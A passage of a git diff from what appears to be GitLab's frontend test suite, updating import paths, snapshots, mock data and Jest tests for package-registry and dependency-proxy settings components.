gl-pr-1" > <gl-button-stub aria-label="Remove package" diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/infrastructure_icon_and_name_spec.js index ef26c729691..abb0d23b6e4 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/infrastructure_icon_and_name_spec.js @@ -1,6 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import InfrastructureIconAndName from '~/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name.vue'; +import InfrastructureIconAndName from '~/packages_and_registries/infrastructure_registry/shared/infrastructure_icon_and_name.vue'; describe('InfrastructureIconAndName', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/package_list_row_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/package_list_row_spec.js index 5f2fc8ddfbd..1052fdd1dda 100644 --- a/spec/frontend/packages/shared/components/package_list_row_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/package_list_row_spec.js @@ -2,13 +2,13 @@ import { GlLink } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagePath from '~/packages/shared/components/package_path.vue'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import { PACKAGE_ERROR_STATUS } from '~/packages/shared/constants'; +import PackagesListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import { PACKAGE_ERROR_STATUS } from '~/packages_and_registries/shared/constants'; import ListItem from '~/vue_shared/components/registry/list_item.vue'; -import { packageList } from '../../mock_data'; +import { packageList } from '../mock_data'; describe('packages_list_row', () => { let wrapper; @@ -17,12 +17,10 @@ describe('packages_list_row', () => { const [packageWithoutTags, packageWithTags] = packageList; const InfrastructureIconAndName = { name: 'InfrastructureIconAndName', template: '<div></div>' }; - const PackageIconAndName = { name: 'PackageIconAndName', template: '<div></div>' }; const findPackageTags = () => wrapper.findComponent(PackageTags); const findPackagePath = () => wrapper.findComponent(PackagePath); const findDeleteButton = () => wrapper.findByTestId('action-delete'); - const findPackageIconAndName = () => wrapper.findComponent(PackageIconAndName); const findInfrastructureIconAndName = () => wrapper.findComponent(InfrastructureIconAndName); const findListItem = () => wrapper.findComponent(ListItem); const findPackageLink = () => wrapper.findComponent(GlLink); @@ -41,7 +39,6 @@ describe('packages_list_row', () => { stubs: { ListItem, InfrastructureIconAndName, - PackageIconAndName, }, propsData: { packageLink: 'foo', @@ -93,13 +90,13 @@ describe('packages_list_row', () => { it('shows the type when set', () => { mountComponent(); - expect(findPackageIconAndName().exists()).toBe(true); + expect(findInfrastructureIconAndName().exists()).toBe(true); }); it('does not show the type when not set', () => { mountComponent({ showPackageType: false }); - expect(findPackageIconAndName().exists()).toBe(false); + expect(findInfrastructureIconAndName().exists()).toBe(false); }); }); @@ -135,27 +132,6 @@ describe('packages_list_row', () => { }); }); - describe('Infrastructure config', () => { - it('defaults to package registry components', () => { - mountComponent(); - - expect(findPackageIconAndName().exists()).toBe(true); - expect(findInfrastructureIconAndName().exists()).toBe(false); - }); - - it('mounts different component based on the provided values', () => { - mountComponent({ - provide: { - iconComponent: 'InfrastructureIconAndName', - }, - }); - - expect(findPackageIconAndName().exists()).toBe(false); - - expect(findInfrastructureIconAndName().exists()).toBe(true); - }); - }); - describe(`when the package is in ${PACKAGE_ERROR_STATUS} status`, () => { beforeEach(() => { mountComponent({ packageEntity: { ...packageWithoutTags, status: PACKAGE_ERROR_STATUS } }); diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap index c95538546c1..7aa42a1f1e5 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap @@ -5,7 +5,7 @@ exports[`VersionRow renders 1`] = ` class="gl-display-flex gl-flex-direction-column gl-border-b-solid gl-border-t-solid gl-border-t-1 gl-border-b-1 gl-border-t-transparent gl-border-b-gray-100" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js b/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js index d59c3184e4e..6ad6007c9da 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlSprintf } from '@gitlab/ui'; import { GlBreakpointInstance } from '@gitlab/ui/dist/utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; import PackageTitle from '~/packages_and_registries/package_registry/components/details/package_title.vue'; import { PACKAGE_TYPE_CONAN, diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js b/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js index f7613949fe4..faeca76d746 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js @@ -1,8 +1,8 @@ import { GlLink, GlSprintf, GlTruncate } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { getIdFromGraphQLId } from '~/graphql_shared/utils'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import PublishMethod from '~/packages/shared/components/publish_method.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import PublishMethod from '~/packages_and_registries/shared/components/publish_method.vue'; import VersionRow from '~/packages_and_registries/package_registry/components/details/version_row.vue'; import ListItem from '~/vue_shared/components/registry/list_item.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap index 2f2be797251..165ee962417 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap @@ -6,7 +6,7 @@ exports[`packages_list_row renders 1`] = ` data-qa-selector="package_row" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> @@ -77,7 +77,9 @@ exports[`packages_list_row renders 1`] = ` <div class="gl-display-flex gl-align-items-center gl-min-h-6" > - <span> + <span + data-testid="created-date" + > Created <timeago-tooltip-stub cssclass="" @@ -90,7 +92,7 @@ exports[`packages_list_row renders 1`] = ` </div> <div - class="gl-w-9 gl-display-none gl-sm-display-flex gl-justify-content-end gl-pr-1" + class="gl-w-9 gl-display-flex gl-justify-content-end gl-pr-1" > <gl-button-stub aria-label="Remove package" diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap index 919dbe25ffe..4407c4a2003 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap @@ -37,6 +37,7 @@ exports[`publish_method renders 1`] = ` text="b83d6e391c22777fca1ed3012fce84f633d7fed0" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js b/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js index a276db104d7..292667ec47c 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js @@ -3,9 +3,11 @@ import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import PackagesListRow from '~/packages_and_registries/package_registry/components/list/package_list_row.vue'; -import PackagePath from '~/packages/shared/components/package_path.vue'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import PackageIconAndName from '~/packages/shared/components/package_icon_and_name.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import PackageIconAndName from '~/packages_and_registries/shared/components/package_icon_and_name.vue'; +import PublishMethod from '~/packages_and_registries/package_registry/components/list/publish_method.vue'; +import TimeagoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; import { PACKAGE_ERROR_STATUS } from '~/packages_and_registries/package_registry/constants'; import ListItem from '~/vue_shared/components/registry/list_item.vue'; @@ -29,6 +31,9 @@ describe('packages_list_row', () => { const findPackageLink = () => wrapper.findComponent(GlLink); const findWarningIcon = () => wrapper.findByTestId('warning-icon'); const findLeftSecondaryInfos = () => wrapper.findByTestId('left-secondary-infos'); + const findPublishMethod = () => wrapper.findComponent(PublishMethod); + const findCreatedDateText = () => wrapper.findByTestId('created-date'); + const findTimeAgoTooltip = () => wrapper.findComponent(TimeagoTooltip); const mountComponent = ({ packageEntity = packageWithoutTags, @@ -153,4 +158,23 @@ describe('packages_list_row', () => { expect(findPackageIconAndName().text()).toBe(packageWithoutTags.packageType.toLowerCase()); }); }); + + describe('right info', () => { + it('has publish method component', () => { + mountComponent({ + packageEntity: { ...packageWithoutTags, pipelines: { nodes: packagePipelines() } }, + }); + + expect(findPublishMethod().props('pipeline')).toEqual(packagePipelines()[0]); + }); + + it('has the created date', () => { + mountComponent(); + + expect(findCreatedDateText().text()).toMatchInterpolatedText(PackagesListRow.i18n.createdAt); + expect(findTimeAgoTooltip().props()).toMatchObject({ + time: packageData().createdAt, + }); + }); + }); }); diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js b/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js index de4e9c8ae5b..97978dee909 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js @@ -1,8 +1,8 @@ import { GlKeysetPagination, GlModal, GlSprintf } from '@gitlab/ui'; import { nextTick } from 'vue'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; +import PackagesListRow from '~/packages_and_registries/package_registry/components/list/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; import { DELETE_PACKAGE_TRACKING_ACTION, REQUEST_DELETE_PACKAGE_TRACKING_ACTION, diff --git a/spec/frontend/packages_and_registries/package_registry/mock_data.js b/spec/frontend/packages_and_registries/package_registry/mock_data.js index bacc748db81..4c23b52b8a2 100644 --- a/spec/frontend/packages_and_registries/package_registry/mock_data.js +++ b/spec/frontend/packages_and_registries/package_registry/mock_data.js @@ -16,11 +16,13 @@ export const packagePipelines = (extend) => [ ref: 'master', sha: 'b83d6e391c22777fca1ed3012fce84f633d7fed0', project: { + id: '1', name: 'project14', webUrl: 'http://gdk.test:3000/namespace14/project14', __typename: 'Project', }, user: { + id: 'user-1', name: 'Administrator', }, ...extend, @@ -89,6 +91,7 @@ export const dependencyLinks = () => [ ]; export const packageProject = () => ({ + id: '1', fullPath: 'gitlab-org/gitlab-test', webUrl: 'http://gdk.test:3000/gitlab-org/gitlab-test', __typename: 'Project', @@ -127,6 +130,7 @@ export const packageData = (extend) => ({ }); export const conanMetadata = () => ({ + id: 'conan-1', packageChannel: 'stable', packageUsername: 'gitlab-org+gitlab-test', recipe: 'package-8/1.0.0@gitlab-org+gitlab-test/stable', @@ -179,6 +183,7 @@ export const packageDetailsQuery = (extendPackage) => ({ ...nugetMetadata(), }, project: { + id: '1', path: 'projectPath', }, tags: { @@ -270,6 +275,7 @@ export const packageDestroyFileMutationError = () => ({ export const packagesListQuery = ({ type = 'group', extend = {}, extendPagination = {} } = {}) => ({ data: { [type]: { + id: '1', packages: { count: 2, nodes: [ diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/app_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/pages/__snapshots__/list_spec.js.snap index 5af75868084..dbe3c70c3cb 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/app_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/pages/__snapshots__/list_spec.js.snap @@ -4,7 +4,7 @@ exports[`PackagesListApp renders 1`] = ` <div> <package-title-stub count="2" - helpurl="packageHelpUrl" + helpurl="/help/user/packages/index" /> <package-search-stub /> @@ -35,17 +35,21 @@ exports[`PackagesListApp renders 1`] = ` class="text-content gl-mx-auto gl-my-0 gl-p-5" > <h1 - class="h4" + class="gl-font-size-h-display gl-line-height-36 h4" > - There are no packages yet + + There are no packages yet + </h1> - <p> + <p + class="gl-mt-3" + > Learn how to <b-link-stub class="gl-link" event="click" - href="emptyListHelpUrl" + href="/help/user/packages/package_registry/index" routertag="a" target="_blank" > diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/app_spec.js b/spec/frontend/packages_and_registries/package_registry/pages/list_spec.js index ad848f367e0..2ac2a6455ef 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/app_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/pages/list_spec.js @@ -6,7 +6,7 @@ import { nextTick } from 'vue'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import PackageListApp from '~/packages_and_registries/package_registry/components/list/app.vue'; +import ListPage from '~/packages_and_registries/package_registry/pages/list.vue'; import PackageTitle from '~/packages_and_registries/package_registry/components/list/package_title.vue'; import PackageSearch from '~/packages_and_registries/package_registry/components/list/package_search.vue'; import OriginalPackageList from '~/packages_and_registries/package_registry/components/list/packages_list.vue'; @@ -16,11 +16,13 @@ import { PROJECT_RESOURCE_TYPE, GROUP_RESOURCE_TYPE, GRAPHQL_PAGE_SIZE, + EMPTY_LIST_HELP_URL, + PACKAGE_HELP_URL, } from '~/packages_and_registries/package_registry/constants'; import getPackagesQuery from '~/packages_and_registries/package_registry/graphql/queries/get_packages.query.graphql'; -import { packagesListQuery, packageData, pagination } from '../../mock_data'; +import { packagesListQuery, packageData, pagination } from '../mock_data'; jest.mock('~/lib/utils/common_utils'); jest.mock('~/flash'); @@ -32,9 +34,7 @@ describe('PackagesListApp', () => { let apolloProvider; const defaultProvide = { - packageHelpUrl: 'packageHelpUrl', emptyListIllustration: 'emptyListIllustration', - emptyListHelpUrl: 'emptyListHelpUrl', isGroupPage: true, fullPath: 'gitlab-org', }; @@ -66,7 +66,7 @@ describe('PackagesListApp', () => { const requestHandlers = [[getPackagesQuery, resolver]]; apolloProvider = createMockApollo(requestHandlers); - wrapper = shallowMountExtended(PackageListApp, { + wrapper = shallowMountExtended(ListPage, { localVue, apolloProvider, provide, @@ -113,7 +113,10 @@ describe('PackagesListApp', () => { await waitForFirstRequest(); expect(findPackageTitle().exists()).toBe(true); - expect(findPackageTitle().props('count')).toBe(2); + expect(findPackageTitle().props()).toMatchObject({ + count: 2, + helpUrl: PACKAGE_HELP_URL, + }); }); describe('search component', () => { @@ -213,12 +216,12 @@ describe('PackagesListApp', () => { it('generate the correct empty list link', () => { const link = findListComponent().findComponent(GlLink); - expect(link.attributes('href')).toBe(defaultProvide.emptyListHelpUrl); + expect(link.attributes('href')).toBe(EMPTY_LIST_HELP_URL); expect(link.text()).toBe('publish and share your packages'); }); it('includes the right content on the default tab', () => { - expect(findEmptyState().text()).toContain(PackageListApp.i18n.emptyPageTitle); + expect(findEmptyState().text()).toContain(ListPage.i18n.emptyPageTitle); }); }); @@ -234,8 +237,8 @@ describe('PackagesListApp', () => { }); it('should show specific empty message', () => { - expect(findEmptyState().text()).toContain(PackageListApp.i18n.noResultsTitle); - expect(findEmptyState().text()).toContain(PackageListApp.i18n.widenFilters); + expect(findEmptyState().text()).toContain(ListPage.i18n.noResultsTitle); + expect(findEmptyState().text()).toContain(ListPage.i18n.widenFilters); }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap b/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap index f2087733d2b..5b56cb7f74e 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap +++ b/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap @@ -3,7 +3,7 @@ exports[`settings_titles renders properly 1`] = ` <div> <h5 - class="gl-border-b-solid gl-border-b-1 gl-border-gray-200" + class="gl-border-b-solid gl-border-b-1 gl-border-gray-200 gl-pb-3" > foo diff --git a/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js b/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js index d3a970e86eb..f6c1d212b51 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js @@ -1,6 +1,7 @@ -import { GlSprintf, GlLink, GlToggle } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { GlSprintf, GlToggle } from '@gitlab/ui'; +import { createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -12,14 +13,21 @@ import { } from '~/packages_and_registries/settings/group/constants'; import updateDependencyProxySettings from '~/packages_and_registries/settings/group/graphql/mutations/update_dependency_proxy_settings.mutation.graphql'; +import updateDependencyProxyImageTtlGroupPolicy from '~/packages_and_registries/settings/group/graphql/mutations/update_dependency_proxy_image_ttl_group_policy.mutation.graphql'; import getGroupPackagesSettingsQuery from '~/packages_and_registries/settings/group/graphql/queries/get_group_packages_settings.query.graphql'; import SettingsBlock from '~/vue_shared/components/settings/settings_block.vue'; -import { updateGroupDependencyProxySettingsOptimisticResponse } from '~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; +import SettingsTitles from '~/packages_and_registries/settings/group/components/settings_titles.vue'; import { - dependencyProxySettings, + updateGroupDependencyProxySettingsOptimisticResponse, + updateDependencyProxyImageTtlGroupPolicyOptimisticResponse, +} from '~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; +import { + dependencyProxySettings as dependencyProxySettingsMock, + dependencyProxyImageTtlPolicy as dependencyProxyImageTtlPolicyMock, dependencyProxySettingMutationMock, groupPackageSettingsMock, - dependencyProxySettingMutationErrorMock, + mutationErrorMock, + dependencyProxyUpdateTllPolicyMutationMock, } from '../mock_data'; jest.mock('~/flash'); @@ -30,46 +38,68 @@ const localVue = createLocalVue(); describe('DependencyProxySettings', () => { let wrapper; let apolloProvider; + let updateSettingsMutationResolver; + let updateTtlPoliciesMutationResolver; const defaultProvide = { defaultExpanded: false, groupPath: 'foo_group_path', + groupDependencyProxyPath: 'group_dependency_proxy_path', }; localVue.use(VueApollo); const mountComponent = ({ provide = defaultProvide, - mutationResolver = jest.fn().mockResolvedValue(dependencyProxySettingMutationMock()), isLoading = false, + dependencyProxySettings = dependencyProxySettingsMock(), + dependencyProxyImageTtlPolicy = dependencyProxyImageTtlPolicyMock(), } = {}) => { - const requestHandlers = [[updateDependencyProxySettings, mutationResolver]]; + const requestHandlers = [ + [updateDependencyProxySettings, updateSettingsMutationResolver], + [updateDependencyProxyImageTtlGroupPolicy, updateTtlPoliciesMutationResolver], + ]; apolloProvider = createMockApollo(requestHandlers); - wrapper = shallowMount(component, { + wrapper = shallowMountExtended(component, { localVue, apolloProvider, provide, propsData: { - dependencyProxySettings: dependencyProxySettings(), + dependencyProxySettings, + dependencyProxyImageTtlPolicy, isLoading, }, stubs: { GlSprintf, + GlToggle, SettingsBlock, }, }); }; + beforeEach(() => { + updateSettingsMutationResolver = jest + .fn() + .mockResolvedValue(dependencyProxySettingMutationMock()); + updateTtlPoliciesMutationResolver = jest + .fn() + .mockResolvedValue(dependencyProxyUpdateTllPolicyMutationMock()); + }); + afterEach(() => { wrapper.destroy(); }); const findSettingsBlock = () => wrapper.findComponent(SettingsBlock); - const findDescription = () => wrapper.find('[data-testid="description"'); - const findLink = () => wrapper.findComponent(GlLink); - const findToggle = () => wrapper.findComponent(GlToggle); + const findSettingsTitles = () => wrapper.findComponent(SettingsTitles); + const findDescription = () => wrapper.findByTestId('description'); + const findDescriptionLink = () => wrapper.findByTestId('description-link'); + const findEnableProxyToggle = () => wrapper.findByTestId('dependency-proxy-setting-toggle'); + const findEnableTtlPoliciesToggle = () => + wrapper.findByTestId('dependency-proxy-ttl-policies-toggle'); + const findToggleHelpLink = () => wrapper.findByTestId('toggle-help-link'); const fillApolloCache = () => { apolloProvider.defaultClient.cache.writeQuery({ @@ -81,10 +111,6 @@ describe('DependencyProxySettings', () => { }); }; - const emitSettingsUpdate = (value = false) => { - findToggle().vm.$emit('change', value); - }; - it('renders a settings block', () => { mountComponent(); @@ -112,19 +138,93 @@ describe('DependencyProxySettings', () => { it('has the correct link', () => { mountComponent(); - expect(findLink().attributes()).toMatchObject({ + expect(findDescriptionLink().attributes()).toMatchObject({ href: DEPENDENCY_PROXY_DOCS_PATH, }); - expect(findLink().text()).toBe('Learn more'); + expect(findDescriptionLink().text()).toBe('Learn more'); + }); + + describe('enable toggle', () => { + it('exists', () => { + mountComponent(); + + expect(findEnableProxyToggle().props()).toMatchObject({ + label: component.i18n.enabledProxyLabel, + }); + }); + + describe('when enabled', () => { + beforeEach(() => { + mountComponent(); + }); + + it('has the help prop correctly set', () => { + expect(findEnableProxyToggle().props()).toMatchObject({ + help: component.i18n.enabledProxyHelpText, + }); + }); + + it('has help text with a link', () => { + expect(findEnableProxyToggle().text()).toContain( + 'To see the image prefix and what is in the cache, visit the Dependency Proxy', + ); + expect(findToggleHelpLink().attributes()).toMatchObject({ + href: defaultProvide.groupDependencyProxyPath, + }); + }); + }); + + describe('when disabled', () => { + beforeEach(() => { + mountComponent({ + dependencyProxySettings: dependencyProxySettingsMock({ enabled: false }), + }); + }); + + it('has the help prop set to empty', () => { + expect(findEnableProxyToggle().props()).toMatchObject({ + help: '', + }); + }); + + it('the help text is not visible', () => { + expect(findToggleHelpLink().exists()).toBe(false); + }); + }); + }); + + describe('storage settings', () => { + it('the component has the settings title', () => { + mountComponent(); + + expect(findSettingsTitles().props()).toMatchObject({ + title: component.i18n.storageSettingsTitle, + }); + }); + + describe('enable proxy ttl policies', () => { + it('exists', () => { + mountComponent(); + + expect(findEnableTtlPoliciesToggle().props()).toMatchObject({ + label: component.i18n.ttlPolicyEnabledLabel, + help: component.i18n.ttlPolicyEnabledHelpText, + }); + }); + }); }); - describe('settings update', () => { + describe.each` + toggleName | toggleFinder | localErrorMock | optimisticResponse + ${'enable proxy'} | ${findEnableProxyToggle} | ${dependencyProxySettingMutationMock} | ${updateGroupDependencyProxySettingsOptimisticResponse} + ${'enable ttl policies'} | ${findEnableTtlPoliciesToggle} | ${dependencyProxyUpdateTllPolicyMutationMock} | ${updateDependencyProxyImageTtlGroupPolicyOptimisticResponse} + `('$toggleName settings update ', ({ optimisticResponse, toggleFinder, localErrorMock }) => { describe('success state', () => { it('emits a success event', async () => { mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -136,26 +236,28 @@ describe('DependencyProxySettings', () => { fillApolloCache(); - expect(findToggle().props('value')).toBe(true); + expect(toggleFinder().props('value')).toBe(true); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); - expect(updateGroupDependencyProxySettingsOptimisticResponse).toHaveBeenCalledWith({ - enabled: false, - }); + expect(optimisticResponse).toHaveBeenCalledWith( + expect.objectContaining({ + enabled: false, + }), + ); }); }); describe('errors', () => { it('mutation payload with root level errors', async () => { - const mutationResolver = jest - .fn() - .mockResolvedValue(dependencyProxySettingMutationErrorMock); - mountComponent({ mutationResolver }); + updateSettingsMutationResolver = jest.fn().mockResolvedValue(mutationErrorMock); + updateTtlPoliciesMutationResolver = jest.fn().mockResolvedValue(mutationErrorMock); + + mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -163,14 +265,16 @@ describe('DependencyProxySettings', () => { }); it.each` - type | mutationResolver - ${'local'} | ${jest.fn().mockResolvedValue(dependencyProxySettingMutationMock({ errors: ['foo'] }))} + type | mutationResolverMock + ${'local'} | ${jest.fn().mockResolvedValue(localErrorMock({ errors: ['foo'] }))} ${'network'} | ${jest.fn().mockRejectedValue()} - `('mutation payload with $type error', async ({ mutationResolver }) => { - mountComponent({ mutationResolver }); + `('mutation payload with $type error', async ({ mutationResolverMock }) => { + updateSettingsMutationResolver = mutationResolverMock; + updateTtlPoliciesMutationResolver = mutationResolverMock; + mountComponent(); fillApolloCache(); - emitSettingsUpdate(); + toggleFinder().vm.$emit('change', false); await waitForPromises(); @@ -180,10 +284,16 @@ describe('DependencyProxySettings', () => { }); describe('when isLoading is true', () => { - it('disables enable toggle', () => { + it('disables enable proxy toggle', () => { + mountComponent({ isLoading: true }); + + expect(findEnableProxyToggle().props('disabled')).toBe(true); + }); + + it('disables enable ttl policies toggle', () => { mountComponent({ isLoading: true }); - expect(findToggle().props('disabled')).toBe(true); + expect(findEnableTtlPoliciesToggle().props('disabled')).toBe(true); }); }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js b/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js index e4d62bc6a6e..933dac7f5a8 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/group_settings_app_spec.js @@ -10,7 +10,12 @@ import DependencyProxySettings from '~/packages_and_registries/settings/group/co import component from '~/packages_and_registries/settings/group/components/group_settings_app.vue'; import getGroupPackagesSettingsQuery from '~/packages_and_registries/settings/group/graphql/queries/get_group_packages_settings.query.graphql'; -import { groupPackageSettingsMock, packageSettings, dependencyProxySettings } from '../mock_data'; +import { + groupPackageSettingsMock, + packageSettings, + dependencyProxySettings, + dependencyProxyImageTtlPolicy, +} from '../mock_data'; jest.mock('~/flash'); @@ -66,11 +71,17 @@ describe('Group Settings App', () => { await nextTick(); }; + const packageSettingsProps = { packageSettings: packageSettings() }; + const dependencyProxyProps = { + dependencyProxySettings: dependencyProxySettings(), + dependencyProxyImageTtlPolicy: dependencyProxyImageTtlPolicy(), + }; + describe.each` - finder | entityProp | entityValue | successMessage | errorMessage - ${findPackageSettings} | ${'packageSettings'} | ${packageSettings()} | ${'Settings saved successfully'} | ${'An error occurred while saving the settings'} - ${findDependencyProxySettings} | ${'dependencyProxySettings'} | ${dependencyProxySettings()} | ${'Setting saved successfully'} | ${'An error occurred while saving the setting'} - `('settings blocks', ({ finder, entityProp, entityValue, successMessage, errorMessage }) => { + finder | entitySpecificProps | successMessage | errorMessage + ${findPackageSettings} | ${packageSettingsProps} | ${'Settings saved successfully'} | ${'An error occurred while saving the settings'} + ${findDependencyProxySettings} | ${dependencyProxyProps} | ${'Setting saved successfully'} | ${'An error occurred while saving the setting'} + `('settings blocks', ({ finder, entitySpecificProps, successMessage, errorMessage }) => { beforeEach(() => { mountComponent(); return waitForApolloQueryAndRender(); @@ -83,7 +94,7 @@ describe('Group Settings App', () => { it('binds the correctProps', () => { expect(finder().props()).toMatchObject({ isLoading: false, - [entityProp]: entityValue, + ...entitySpecificProps, }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js b/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js index a61edad8685..fcfad4b42b8 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/settings_titles_spec.js @@ -4,15 +4,19 @@ import SettingsTitles from '~/packages_and_registries/settings/group/components/ describe('settings_titles', () => { let wrapper; - const mountComponent = () => { + const defaultProps = { + title: 'foo', + subTitle: 'bar', + }; + + const mountComponent = (propsData = defaultProps) => { wrapper = shallowMount(SettingsTitles, { - propsData: { - title: 'foo', - subTitle: 'bar', - }, + propsData, }); }; + const findSubTitle = () => wrapper.find('p'); + afterEach(() => { wrapper.destroy(); }); @@ -22,4 +26,10 @@ describe('settings_titles', () => { expect(wrapper.element).toMatchSnapshot(); }); + + it('does not render the subtitle paragraph when no subtitle is passed', () => { + mountComponent({ title: defaultProps.title }); + + expect(findSubTitle().exists()).toBe(false); + }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js b/spec/frontend/packages_and_registries/settings/group/graphl/utils/cache_update_spec.js index 9d8504a1124..a5b571a0241 100644 --- 